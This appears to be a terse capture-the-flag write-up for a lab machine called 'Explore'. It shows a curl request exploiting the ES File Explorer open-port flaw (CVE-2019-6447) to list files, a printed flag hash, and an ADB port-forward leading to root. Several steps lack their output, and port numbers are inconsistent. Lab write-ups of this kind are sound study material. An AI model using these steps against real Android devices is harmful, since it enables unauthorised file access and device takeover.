kedaegan.github.io

Explore

Enumeration

Ports and Services

Initial Foothold

Visiting port 5977 shows a forbidden directory listing:

WFUZZ:

Port 42135 is vulnerable to CVE-2019-6447
Poc from https://github.com/fs0c131y/ESFileExplorerOpenPortVuln used to list files:

The WFUZZ and Poc have similar directories
wfuzz /sdcard

Searching for .txt files:

Found /sdcard/user.txt

User.txt Proof Screenshot

User.txt Contents

f32017174c7c7e8f50c6da52891ae250

Privilege Escalation

Replicated PoC manually:
curl –header “Content-Type: application/json” --request POST –data ‘{“command”:”listFiles”}’ http://10.129.132.118:59777/sdcard

Creds.jpg found in /sdcard/DCIM

Port 5555 (Android Debugger was filtered form outside. Oninside it seems to be listening as well

Portforwarded 555 to localhost:

Started ADB:

Started shell on ssh connection:

Found root.txt:
find / -name “root.txt”

RootScreenshot Here: